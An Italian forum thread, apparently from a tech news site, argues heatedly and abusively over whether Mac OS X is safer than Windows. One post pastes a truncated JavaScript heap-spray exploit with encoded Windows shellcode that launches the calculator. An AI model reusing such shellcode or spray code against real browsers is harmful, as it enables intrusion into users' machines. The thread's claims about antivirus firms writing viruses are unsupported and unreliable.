            l'antivirus....dunque vediamo, nei primi DUE giorni hanno venduto DUEMILIONI di copie di Leopard... se la Norton faceva un bel virus e poi vendeva l'antivirus a 1 con rinnovo annuale... si fa come minimo MILIONI DI EURO all'anno... sono ancora spiccioli?
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.

            dunque vediamo, nei primi DUE giorni hanno
            venduto DUEMILIONI di copie di Leopard... se la
            Norton faceva un bel virus e poi vendeva
            l'antivirus a 1 con rinnovo annuale... si fa
            come minimo MILIONI DI EURO all'anno... sono
            ancora
            spiccioli?dunque vediamo...... che percentuale è in confronto a quella che guadagna con windows?fammi pensare........... si, sono spiccioli.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            già non vale la pensa investire un mese di lavoro (tanto con tutte le falle che ci sono) per poi fatturare MILIONI DI all'anno...In più la diffusione di Mac è 6%... dunque nel mondo siamo 6miliardi facciamo che 2miliardi hanno il PC e che 500milioni usano l'antivirus crackato... restano 1,5 miliardi... sono 9.000.000 di utenti MAC... vendendo l'antivirus a 20 all'anno (costa più meno quello no?) sono:20*9.000.000=180.000.000 di all'anno poco per un mese di lavoro vero?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: MeX
            già non vale la pensa investire un mese di lavoro
            (tanto con tutte le falle che ci sono) per poi
            fatturare MILIONI DI
            all'anno...
            In più la diffusione di Mac è 6%... dunque nel
            mondo siamo 6miliardi facciamo che 2miliardi
            hanno il PC e che 500milioni usano l'antivirus
            crackato... restano 1,5 miliardi... sono
            9.000.000 di utenti MAC... vendendo l'antivirus a
            20 all'anno (costa più meno quello no?)
            sono:
            20*9.000.000=180.000.000 di all'anno poco per
            un mese di lavoro
            vero?solo un emerito asino ti direbbe che commercialmente non ne vale la pena.
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            leggi dopo trollettino
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            sarà l'ennesima razzata
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.
            ovvio
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            è arrivato l'altro intelligentone
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            certo Mr John Maynard Keynes de noartri
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            e il virus come lo veicoli??che percentuale è ogni istante quella dei mac collegati rispetto agli altri sistemi?ritorna la teoria della diffusione....ma a quanto pare è un concetto troppo difficile...sempre col tuo conto farlocco:1,5 miliardi meno i tuoi 9 milioni = 1,491 miliardi1,491 miliardi x 20 euro = 29,82 MILIARDI DI EURO.se permetti 180 milioni sono trascurabili.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            si non val la pena incassarli giusto? nemmeno per una startup... sono briciole... che fatturazione misera... non ti ci paghi nemmeno l'RCA dell'X5...
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            esatto, è un mercato in cui non vale la pena investire in marketing. ci spenderesti l'equivalente solo in pubblicità.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate
            esatto, è un mercato in cui non vale la pena
            investire in marketing. ci spenderesti
            l'equivalente solo in
            pubblicità.appunto, un emerita razzata.vincerai il premio per l'imprenditore dell'anno.
          • FinalCut scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate
            esatto, è un mercato in cui non vale la pena
            investire in marketing. ci spenderesti
            l'equivalente solo in
            pubblicità.Conosco una azienda a Redmond che sarebbe interessata a gettare simile pubblicità negativa contro Apple... come ha tentato di fare contro il "cancro"(linux) Se non ci credi che sarebbe disposta a questo ed altro leggiti "Knife the baby"...http://www.businessweek.com/microsoft/updates/up81105b.htmquesta è la storia completa del complotto di Microsoft per uccidere QuickTime:http://www.roughlydrafted.com/RD/RDM.Tech.Q1.07/5F0C866C-6DDF-4A9A-9515-531B0CA0C29C.html(linux)(apple)
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            con l'altro la non ci parlo neppure più perchè ha dimostrato un quoziente intellettivo di un babbuino.secondo me, oggi come oggi, vista la diffusione di osx e le politiche aziendali poco aggressive e poco espansionite di steve (in mercato PC), a MS non gliene frega una cippa di fare un virus per OSX. diverso sarebbe se steve aprisse OSX ai PC.. ma per ora bill sa bene che non lo farebbe mai.. e non si sente minacciato.Quicktime è ben diverso.. è un SW che gira anche su windows e che se lo installi su win, prende il possesso dei sistemi multimediali peggio di un virus. ti credo che MS non lo voglia!sarebbe come se MS facesse WMP per OSX e una volta installato prendesse il sopravvento sul computer instalando una marea di servizi inutili ed invasivi.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            come questo:http://www.flip4mac.com/
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            e allora?cosa c'entra?mah...
          • logicaMente scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate
            e allora?
            cosa c'entra?
            mah...ehm, c'entra, hai presente quando dicevi: sarebbe come se MS facesse WMP per OSX e una volta installato prendesse il sopravvento sul computer instalando una marea di servizi inutili ed invasivi. ecco... non so come dirtelo ma... Microsoft FA WMP per OSX... te lo cerca di installare di straforo anche se metti Office per Mac e il buon MEX ti ha solo messo il link alla versione aggiornata che si chiama flip4machttp://www.microsoft.com/mac/otherproducts/otherproducts.aspx?pid=windowsmedia
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.

            Quicktime è ben diverso.. è un SW che gira anche
            su windows e che se lo installi su win, prende il
            possesso dei sistemi multimediali peggio di un
            virus. ti credo che MS non lo
            voglia!che strano sw distrubuiscono a paperopoli!
            sarebbe come se MS facesse WMP per OSX e una
            volta installato prendesse il sopravvento sul
            computer instalando una marea di servizi inutili
            ed
            invasivi.però visto che questo succede su win allora li va bene, no?bah, avanti col prossimo...
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            non hai capito un cacchio di quello che ho scritto....ma non mi stupisce
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            immagino tu non abbia mai usato WMP su mac, vero?
          • FinalCut scrive:
            Re: MAC OS X più vulnerabile di Windows.

            secondo me, oggi come oggi, vista la diffusione
            di osx e le politiche aziendali poco aggressive e
            poco espansionite di steve (in mercato PC), a MS
            non gliene frega una cippa di fare un virus per
            OSX. vediamo... 80 milioni di iTunes di installato su PC Windows (che comprende anche Quicktime dato che è il core di iTunes)si presumono almeno 15/20 milioni di iPhone venduti entro il 2008dove per ogni iPhone venduto si presuppone l'installazione di Quicktime, iTunes e Safari per Win...andando a scardinare mercati chiave per Redmond quali la musica, il video on demand e la navigazione Web (su iPhone) alla faccia della strategia poco aggressiva...
            diverso sarebbe se steve aprisse OSX ai PC..
            ma per ora bill sa bene che non lo farebbe mai..
            e non si sente minacciato.intendi come quando si diceva che i Mac non sarebbero mai passati ad Intel?Anche IBM era sicura che Apple non avrebbe abbandonato il PPC.
            Quicktime è ben diverso.. è un SW che gira anche
            su windows e che se lo installi su win, prende il
            possesso dei sistemi multimediali peggio di un
            virus.perché peggio di un virus? cosa farebbe di tanto speciale? quando lo installi sei tu ad associare le estensioni dei file che vuoi vengano aperti con Quicktime.
            ti credo che MS non lo
            voglia!M$ non lo vuole per le ovvio ragione esposte sull'articolo da me postato... Peccato poi che M$ in tutti questi anni ha sempre fallito nel dare una alternativa valida a Quickime sulla sua piattaforma ed il decadimento di AVID, Media 100 e Adobe Premiere in favore di Final Cut Pro stanno li a testimoniarlo...
            sarebbe come se MS facesse WMP per OSX e una
            volta installato prendesse il sopravvento sul
            computer instalando una marea di servizi inutili
            ed invasivi.tipo Office per Mac? che non riesce nemmeno sempre a leggere correttamente i file della sua controparte Windows?(linux)(apple)
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            mentre invece fare antivirus per Symbian è un gran business eh? :D AHAHAHHAHAHAAH
          • FinalCut scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate
            e il virus come lo veicoli??
            che percentuale è ogni istante quella dei mac
            collegati rispetto agli altri
            sistemi?ma andiamo ogni giorno i log dei nostri server OS X/Linux sono pieni di tentativi di accesso non autorizzato, per non parlare del fatto che basta infettare una pagina di MySpace o un sito porno per reclutare la tua eventuale fetta di Mac contagiati assieme ai PC Windows...Si dice anche in più di una statistica che in proporzione il popolo della rete più attivo (come blogger, ecc...) siano proprio gli utenti Mac, facilitati dal loro OS nel trattare contenuti multimediali.Il popolo Apple essendo anche un nicchia sarebbe molto facile da colpire, basterebbe colpire siti come "macdailynews.com" per fare una strage di Mac infettati.La fantasia non manca specialmente ai virus writer, guarda caso mancano solo i virus per Mac.(linux)(apple)
          • Infatti.. scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: MeX
            9.000.000 di utenti MAC... E basta?? In tutto il mondo?? Ma è ridicolo! Allora non si può fare nemmeno un paragone.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate

            solo un demente sostiene che windows è bucabile

            solo perché è

            diffuso.

            solo un demente crede che il proprio sistema sia
            completamente sicuro e che non sarà mai
            bucabile.hai ragione, infatti non sono così demente dal pensarlo, mi limito a dire che ci sono OS più sicuri di windows.rimane il demente che mi attribuisce cose mai né pensate né scritte.


            certo...e quale sarebbe la percentuale?

            quella che fa guadagnare assicurando una
            diffusione tale da far percepire il pericolo. lo
            stabilirà chi fa analisi del settore. non lo
            posso dire io di
            certo.
            certo..quale sarebbe questa percentuale? la richiesta di un numero mi pareva molto chiara.



            e 25000 cucuzze non sono un incentivo
            sufficiente

            per

            provarci

            che cazzo vuoi che gliene freghi a una swhouse di
            25000 dollari?
            spiccioli.certo...peccato che le swhouse qui non c'azzecchino una cippaaltra figura del troll!
            forse non hai ancora capito col tuo primordiale
            cervello che chi fa i virus sono quelli che poi
            ti fanno
            l'antivirus....
            certo...e allora mi dovrai poi spiegare come mai su OS X non vi siano virus malgrado l'esistenza di antivirus.fai una cortesia, prenditi 2 ore, informati sugli argomenti di cui scrivi e poi magari torna


            il problema è che se i pasticcioni sono a

            redmond....stiam freschi

            tutti.

            l'interruttore del tuo cervello lo hai mai
            toccato da quando sei nato o lo hai sempre
            lasciato in funzione
            OFF?
            già.. tutti i genialoidi sono a cupertino.
            dove avrei scritto che sono a cupertino?forza fuori il link


            a me pare più fesso chi crede che windows sia

            bucabile solo perché diffuso e non perché

            costruito

            com'è

            a me pari tanto fesso tu
            preferisco essere fesso a modo mio che essere fesso universalmente riconosciuto come lo sei tu


            certo...sono anni che gira Norton e ancora ad

            oggi viene usato per evitare che nelle LAN i

            virus x win si propaghino via i

            mac

            cosa vorresti dimostrare? i mac sono talemente
            presi in considerazione che dai virus sono
            considerati degli switch di rete.... quando
            saranno considerati computer appetibili se ne
            vedranno delle belle. già mi immagino le scene
            isteriche
            generali.certo...intanto scrivevi questo: "chi fa i virus sono quelli che poi ti fanno l'antivirus...."...ma allora dove stanno i virus che la symantec doveva già aver messo in circolazione sul mercato mac? e quelli della intego?dai "Premio Nobel della razzata" che ormai non sei più credibile su nulla
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.

            certo...intanto scrivevi questo: "chi fa i virus
            sono quelli che poi ti fanno
            l'antivirus...."...ma allora dove stanno i virus
            che la symantec doveva già aver messo in
            circolazione sul mercato mac? e quelli della
            intego?

            dai "Premio Nobel della razzata" che ormai non
            sei più credibile su
            nullaahahahahah.. come si vede che sei un ragazzetto senza nessuna conoscenza di leggi di mercato!se sei un adulto.. bah poveretto.. non so che dirti.. che sei messo male come minimo.symantec è in declino, ha sempre fatto prodotti di dubbia utilità. non mi stupisco che abbia fatto un altro dei 1000 prodotti "specchietto" per le allodole.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate

            certo...intanto scrivevi questo: "chi fa i virus

            sono quelli che poi ti fanno

            l'antivirus...."...ma allora dove stanno i virus

            che la symantec doveva già aver messo in

            circolazione sul mercato mac? e quelli della

            intego?



            dai "Premio Nobel della razzata" che ormai non

            sei più credibile su

            nulla

            ahahahahah.. come si vede che sei un ragazzetto
            senza nessuna conoscenza di leggi di
            mercato!visto che sei dottorando in materia...illuminaci, così avremo un pomeriggio di risate.
            se sei un adulto.. bah poveretto.. non so che
            dirti.. che sei messo male come
            minimo.detto da uno che non capisce una fava, sai che importanza ha?
            symantec è in declino, ha sempre fatto prodotti
            di dubbia utilità. non mi stupisco che abbia
            fatto un altro dei 1000 prodotti "specchietto"
            per le
            allodole.certo..mi posti i dati di bilancio degli ultimi 10 anni di tutte le società che fanno antivirus per vedere se hai ragione o se le spari a vuota anche sta volta
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            blah blah blah
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate
            blah blah blah"documentare perima di tutto" immagino sia il tuo motto.CVD: l'ennesimo c@zzaro.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            intanto comincia ad illuminarmi nella materia "Economia"...il resto delle risate per domani eh
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.
            omg un'altro c@azz@ro. :-o
            ahahahahah.. come si vede che sei un ragazzettogne gne gne
            senza nessuna conoscenza di leggi di
            mercato!sentiamole quieste leggi di mercato:enumerale pure qui
            se sei un adulto.. bah poveretto.. non so che
            dirti.. allora taci.solo un ASINO non capisce che è l'architettura a determinare la stabilità del sistema,bsd, *nix e compagnia briscola si usavano prima su serveroni e poi via via fino ai desktop.macosx è un derivato di bsd.$ms_product si usa su cassoni "IBM compatibili" (cioè feccia per utenti) fin da quando quella volta hanno copiato il dos.cioè l'antitesi della stabilità (per facilitarne la scrittura di sw, all'inizio).(e mentre voi marmocchi ve la spassavate in linea di (poco) comando, c'era chi andava di GUI (apple)(amiga))
            che sei messo male come
            minimo.ah bhè detto da un utonto al cuale spilliamo (come minimo) 50 ogni sverminazione...è un complimento! 8)
            symantec è in declino,sycosa? ah, quella che fa i programmi zavorra per la vostra adorata imperfezione con intorno un codice....(ma lol)
            ha sempre fatto prodotti
            di dubbia utilità. infatti avevamo dei dubbi che foste in grado di capire a cosa serve l'antivirus (cosa peraltro specifica della vs traballopiattaforma) dato il numero abnorme di botnet.
            non mi stupisco che abbia
            fatto un altro dei 1000 prodotti "specchietto"
            per le
            allodole.bho, chiacchiere al vento, come la compagnia di win-ciarlosi qui dentro;passa l'antivirus e fai una (ennesima) deframmentata, che forse ti si rischiarano le idee.
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: manolo
            - Scritto da: PLONK_THIS

            - Scritto da: BLah


            Quicktime per Windows, dai tempi di Win95 l'ho


            sempre


            odiato.






            opinione soggettiva e nessun argomentazione

            tecnica,

            irrilevante!






            Non funziona, semplicemente. Ed ora è
            diventato


            quasi uno


            spyware.






            e immagino che oltre alla "butade" sai anche

            portare argomentazioni tecniche,

            vero?



            bah

            Ma quali argomentazioni tecniche può portare un
            winaro.[...]
            Sarà anche per questo che, personalmente, uso
            solo MacOSX e Linux (Archlinux, per
            inciso)?Certo che detto da uno che sta usando un sistema operativo che brucia i dischi da tanta schifezza ci scrive sopra e che come feature principali mette il poter usare windows xp?E perchè poi senti il bisogno di usare due sistemi operativi, il macoshit non ti basta per tutto?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            si parlava di argomentazioni tecniche e tu sei tagliato fuori d'ufficio...
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            si parlava di argomentazioni tecniche e tu sei
            tagliato fuori
            d'ufficio...Ma tranquillo si parla di macosx non c'è niente di tecnico.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone
            - Scritto da: PLONK_THIS

            si parlava di argomentazioni tecniche e tu sei

            tagliato fuori

            d'ufficio...

            Ma tranquillo si parla di macosx non c'è niente
            di
            tecnico.per te che non ne sai una cippa è ovvio, non dovevi specificarlo
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            Ma tranquillo si parla di macosx non c'è niente

            di

            tecnico.
            per te che non ne sai una cippa è ovvio, non
            dovevi
            specificarloMa è per questo che posso parlare tranquillamente di mac. Una cippa è molto più di quanto sanno la maggior parte dei macachi.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone


            Ma tranquillo si parla di macosx non c'è
            niente


            di


            tecnico.

            per te che non ne sai una cippa è ovvio, non

            dovevi

            specificarlo

            Ma è per questo che posso parlare tranquillamente
            di mac. Una cippa è molto più di quanto sanno la
            maggior parte dei
            macachi.e visto che non dici nulla come al solito, ti smentisci da solodai cazzaro che sei solo parole al vento
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            e visto che non dici nulla come al solito, ti
            smentisci da
            solo

            dai cazzaro che sei solo parole al ventoSe non dico nulla come faccio a smentirmi?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            cvd sei un cazzaro DOCfuori i fatti!
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            Balle!Ma proprio per niente... chi scrive un virus per mac? Un altro macaco? il 90% degli utenti mac l'ha comprato perchè arreda. Il restante 10% usa photoshop. E parliamo pur sempre di una quota infima dell'installato mondiale.
            esistevano virus per Mac OS 9 quando l'unico
            meccanismo di diffusione erano i floppy
            disk...E quanto si sono diffusi o stai dicendo che mac os 9 era un colabrodo?
            Non esiste un solo virus che attacchi iTunes (con
            tutti gli 80 milioni di iPod
            collegati)Che ne sai? Se bucano itunes e fregano i dati delle CC secondo te Apple te lo viene a dire? E soprattutto cosa serve scrivere un complicatissimo virus che infetti 80 milioni di ipod? I virus hanno uno scopo che può essere quello di rubare CC, installare dialer, vendere antivirus. La diffusione del mac non giustifica lo sforzo: il programmatore russo lo pago per scrivere un virus che mi renda il più possibile quindi per windows (95% dell'installato). Restano fuori gli hacker / nerd / geek che scrivono virus per il puro scopo di danneggiare le macchine o dimostrare di essere bravi ... beh a parte soffrire il problema della scarsa diffusione, questi su mac proprio non esistono.
            Esistevano virus per Amiga (con il grandissimo
            share che aveva(rotfl) prima di sparire dalla
            faccia della terra O))Appunto, quando c'erano i virus per amiga c'era solo l'amiga e aveva si un grandissimo share. Quando l'amiga è entrato in fase calante sono spariti anche i virus.
            Il 60% dei server al mondo usa sistemi *nix e non
            si vedono molti virus nemmeno
            lì...E come si infetta solitamente una macchina se non installando software di origine dubbia? E quale amminstratore lo fa su un server?Mentre per quanto riguarda i trojan che sfruttano bug del software forse dovresti documentarti un pò meglio, hanno trovato e sfruttato falle di sicurezza nello stratestato, vecchissimo e open source ftpd, nell'ssh, nel telnet, in sendmail ... e ci sono stati un bel pò di server bucherellati (apache.org ad esempio).
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            se hai prove e non illazioni postale e saremo tutti curiosi di acculturarci.fino a quel momento con la teoria della poca diffusione palesi solo di non conoscere le architetture di sistema che non son tutte uguali, ma soprattutto e fotunatamente non come windows
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            se hai prove e non illazioni postale e saremo
            tutti curiosi di
            acculturarci.

            fino a quel momento con la teoria della poca
            diffusione palesi solo di non conoscere le
            architetture di sistema che non son tutte uguali,
            ma soprattutto e fotunatamente non come
            windowsNon ci sono virus per C64, non ci sono virus per amiga, non ci sono virus linux, non ci sono virus per os/2, non ci sono virus per beos... cos'hanno in comune questi sistemi operativi? Sono tutti sotto l'1% dell'installato.Ci sono in compenso una tonnellata di exploit, falle, vulnerabilità per servizi tipici dei sistemi unix, ftp, telnet, ssh, sendmail, ecc. Cos'hanno in comune questi servizi? Sono molto diffusi.Tu hai prove per dire che os x immune da bug? Direi di no visto che te ne hanno appena patchati 31, cosa ci voleva per scrivere un exploit? Qualcuno che lo facesse e per la legge di grandi numeri è molto meno probabile che qualcuno lo faccia per osx rispetto a windows. So che la fredda logica matematica sconvolte il macaco medio, ma il mondo non è solo design.
          • Paco scrive:
            Re: MAC OS X più vulnerabile di Windows.
            I bug esistono sempre. Nessun sistema è esente da bug e questo spiega perché su OSX escanp costantemente (circa una volta al mese) delle patch che risolvono problemi vari.OSX non ha una quota dell'1%, ma più elevata ed in continua crescita. Nonostante questo non esiste NULLA che sia riuscito a creare problemi, non un virus, non altro.Si sono scoperte vulnerabilità, ma per entrare nei sistemi mac era ed è sempre stato necessario scaricare il trojan (o quello che è), installarlo ed inserire la password di amministratore. Capisci anche tu che le possibilità di contagio se non nulle, a zero sono prossime.Perché non scrivi qualcosa di malvagio per X tu? Voglio dire, con tutte le vulnerabilità che dici che ci sono...dovrebbe essere una passeggiata. O no?
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            Perché non scrivi qualcosa di malvagio per X tu?
            Voglio dire, con tutte le vulnerabilità che dici
            che ci sono...dovrebbe essere una passeggiata. O
            no?E perchè dovrei farlo?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            Perché non scrivi qualcosa di malvagio per X tu?

            Voglio dire, con tutte le vulnerabilità che dici

            che ci sono...dovrebbe essere una passeggiata. O

            no?

            E perchè dovrei farlo?perché dici che è una passeggiata farlo e che stranamente nessuno lo fa.
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            perché dici che è una passeggiata farlo e che
            stranamente nessuno lo
            fa.E ti sembra una ragione valida? Devo scaricarmi la copia pirata e installare macoshit su una virtual machine solo per dimostrare a te che si buca?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            perché dici che è una passeggiata farlo e che

            stranamente nessuno lo

            fa.

            E ti sembra una ragione valida? Devo scaricarmi
            la copia pirata e installare macoshit su una
            virtual machine solo per dimostrare a te che si
            buca?e quindi non parli per esperienza, ma per sentito dire....non dovevi confermarlo.usa darwin che è open trolletto
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            e quindi non parli per esperienza, ma per sentito
            dire....non dovevi
            confermarlo.

            usa darwin che è open trollettoSei una causa persa. Dovevi solo rispondere a una domanda: perchè dovrei farlo? Sono 3 parole, ce la fai a capirne il significato?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            e quindi non parli per esperienza, ma per
            sentito

            dire....non dovevi

            confermarlo.



            usa darwin che è open trolletto

            Sei una causa persa. Dovevi solo rispondere a una
            domanda: perchè dovrei farlo? Sono 3 parole, ce
            la fai a capirne il
            significato?perché hai detto che è una passeggiata...e ti è stato chiesto di darcene prova.
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            perché hai detto che è una passeggiata...e ti è
            stato chiesto di darcene
            prova.Ok, aspetta, leggi bene: perchè? Non sono un 15enne, non mi fa sentire figo provare che qualcosa si può fare. Vediamo i soldi e se ne può parlare.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            se riesci a farlo ti dò 1500 (di più proprio non ce la faccio!)
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: MeX
            se riesci a farlo ti dò 1500 (di più proprio non
            ce la
            faccio!)Pochino eh? Un exploit per windows vale molto di più.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            si quanto? visto che sei informato...
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: MeX
            si quanto? visto che sei informato...Ci devi aggiungere un paio di zeri.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            mi posti un link al riguardo? grazie.
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: MeX
            mi posti un link al riguardo? grazie.http://blog.washingtonpost.com/securityfix/2006/06/more_exploits_out_for_newlypat.html
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            altra figura barbinahttp://macdailynews.com/index.php/weblog/comments/mac_os_x_virus_prize_2005_offers_25000_cash_prize/
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            altra figura barbina

            http://macdailynews.com/index.php/weblog/comments/AHAHAHAHAHAHAHAHAHAH ce l'hai fatta a postare l'articolo finalmente... oddio, quasi mi vergogno a piantartelo in quel posto con tale facilitàhttp://macdailynews.com/index.php/weblog/comments/5330/Aspetta che vale la pena riportalo per intero vista la magnitudine nella tua figura di cacca... DVForge cancels Mac OS X Virus Prize ContestSaturday, March 26, 2005 - 05:06 PM EST DVForge's Mac OS X Virus Prize 2005 contest had a goal: "To lay to rest, once and for all, the myths surrounding the lack of spreading computer virii on the Macintosh OS X operating system, by sponsoring a contest that challenges virus writers to actually prove that they can introduce a harmless virus into two modern OS X Macs."That was the goal of a contest announced recently by DVForge, but, due to a variety of influencing factors was cancelled shortly after having been announced.DVForge has issued a statement about the contest's cancellation:"In response to the statements put forth this past week by Symantec Corporation suggesting that Mac users are at substantial risk to infections from viruses, our company crafted and announced a contest that would have paid a $25,000 prize for the successful creation of such a virus," said Jack Campbell, DVForge, Inc. CEO. "During the first several hours after making the public announcement, I was contacted by a large number of Mac users and Mac software professionals who shared their thinking with me about the contest. A few of these people are extremely well-regarded experts in the field of Mac OS X security. So, I have taken their advice very seriously, and have made the difficult decision to cancel our contest. I have been convinced that the risk of a virus on the OS X platform is not zero, although it is remarkably close to zero. More importantly, I have been convinced that there may be legality issues stemming from such a contest, beyond those determined by our own legal counsel, prior to announcing the contest. So, despite my personal distaste for what some companies have done to take advantage of virus fears among the Mac community, and my own inclination to make a bold statement in response to those fears, I have no responsible choice but to retract the contest, effective immediately."DVForge's contest page also conatins the text: "Liability Statement: We do not endorse the creation or distribution of computer viruses. U.S. and international law, as well as simple good judgment forbid the transmission of computer viruses."
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            è da post che circola quel link cazzaro...e che tu fai copy paste senza capire l'ingleseciappa cazzaro ciappa I have been convinced that the risk of a virus on the OS X platform is not zero, although it is remarkably close to zero. More importantly, I have been convinced that there may be legality issues stemming from such a contest, beyond those determined by our own legal counsel, prior to announcing the contest. So, despite my personal distaste for what some companies have done to take advantage of virus fears among the Mac community, and my own inclination to make a bold statement in response to those fears, I have no responsible choice but to retract the contest, effective immediately.
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            è da post che circola quel link cazzaro...e che
            tu fai copy paste senza capire
            l'inglese

            ciappa cazzaro ciappa

            I have been convinced that the risk of a
            virus on the OS X platform is not zero, although
            it is remarkably close to
            zero. E cosa dovrebbe dimostrare? Hai un degno compare che è convinto che il rischio dei virus su mac sia zero. In compenso ha cancellato il premio perchè gli esperti gli hanno detto "ehi occhio..."Geniale...
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone
            - Scritto da: PLONK_THIS

            è da post che circola quel link cazzaro...e che

            tu fai copy paste senza capire

            l'inglese



            ciappa cazzaro ciappa



            I have been convinced that the risk of a

            virus on the OS X platform is not zero, although

            it is remarkably close to

            zero.

            E cosa dovrebbe dimostrare? se non sai leggere è capire non è colpa di altriHai un degno compare
            che è convinto che il rischio dei virus su mac
            sia zero. In compenso ha cancellato il premio
            perchè gli esperti gli hanno detto "ehi
            occhio..."
            Geniale...quale parte di More importantly, I have been convinced that there may be legality issues stemming from such a contest, beyond those determined by our own legal counsel, prior to announcing the contest. So, despite my personal distaste for what some companies have done to take advantage of virus fears among the Mac community, and my own inclination to make a bold statement in response to those fears, I have no responsible choice but to retract the contest, effective immediately. non riesci a capire in inglese?
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.
            var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc)"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");var address = 0x0D0D0D0D;var block_size = 0x400000;var blocks = (address - block_size) / block_size;var spray = unescape("%u0D0D%u0D0D");var tmp = "x0Dx0Dx0Dx0D";var tmp_size = 1044;while((spray.length * 2)
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            perché hai detto che è una passeggiata...e ti è

            stato chiesto di darcene

            prova.

            Ok, aspetta, leggi bene: perchè?
            leggi bene£: perché dici che è una passeggiata. tu l'hai affermato tu dimostracelo.a te l'onere della prova
            Non sono un 15enne, non mi fa sentire figo
            provare che qualcosa si può fare. Vediamo i soldi
            e se ne può
            parlare.qui non è un problema di sentirsi figo, ma provare quanto si afferma.e qui sei un maestro Jedi ;-)
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            qui non è un problema di sentirsi figo, ma
            provare quanto si
            afferma.

